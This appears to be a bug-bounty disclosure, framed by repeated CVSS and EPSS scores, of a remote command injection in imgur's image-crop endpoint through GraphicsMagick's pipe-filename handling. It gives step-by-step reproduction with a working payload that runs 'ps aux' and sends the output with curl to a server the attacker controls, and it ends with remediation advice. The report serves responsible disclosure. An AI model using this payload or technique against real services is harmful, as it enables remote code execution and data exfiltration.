9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
99.9%
The y
parameter of /edit/process
endpoint (with a=crop
) is vulnerable to command-line argument injection to something that appears to be GraphicsMagick utility (probably gm convert
). Due to GraphicsMagickβs hacker-friendly processing of |
-starting filenames supplied to -write
option, it leads to command execution.
Enable Burp Proxy or similar software that allows you to log and edit HTTP requests.
Login into your imgur account and upload an image.
Move your mouse over the image, click on the tiny button with pencil on it, then click βEditβ.
Select a random rectangle on the image, then click βApplyβ.
In the burp suite, you will see a request to an URL like this: http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0&w=700&h=746&random=4011802027746510
Change the y
parameter of the request so it becomes 0 -write |ps${IFS}aux|curl${IFS}http://<your-server>${IFS}-d${IFS}@-
.
The full URL after the change must look like http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0%20-write%20|ps${IFS}aux|curl${IFS}http://<your-server>{IFS}-d${IFS}@-&w=700&h=830&random=9905392865702303
, note that you have to change <your-server>
to a webserver under your control).
Fire a request to the modified URL. The command (ps aux|curl http://<your-server> -d @-
) will be executed somewhere inside imgur, and you will get a HTTP request to <your-server>
with the result of ps aux
in the POST body. You can replace ps aux
with another command (but you have to write ${IFS}
instead of spaces).
I was searching for CVE-2016-10033-like vulnerabilities on several bugbounty sites when I noticed strange behaviour of the mentioned parameter. The vulnerability exists because the user input (the contents of y
GET parameter) goes into a shell command. While all special characters (like |
, $
and so on) seem to be escaped, the space character is not. This allows the attacker to insert additinal command line arguments. The common reason for such behaviour is escapeshellcmd
PHP function, but that can also be some kind of custom input filtering/processing.
The rest of the exploitation depends on the program that is executed (we need to find out if it supports any dangerous command-line options). Common sense suggests that the external command launched by βCrop/Resizeβ function must be some image processing tool. The most popular one is ImageMagick/GraphicsMagick, so I appended -rotate 90
to the parameter and it succeded β I saw lying Trump (I mean, the image was rotated). After more tries I was sure itβs GraphicsMagick (probably gm convert
utility). I read the documentation and found that -write
argument supports perl-style filenames starting with a pipe β in this case the rest of the filename must be a command to execute.
Probably either some kind of custom processing or escapeshellcmd
function is used to construct the command line. In both cases, replace it with applying escapeshellarg
to individual arguments. In the second case, you probably want to run grep -R escapeshellcmd <path to the source code>
to find more vulns :-)
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
99.9%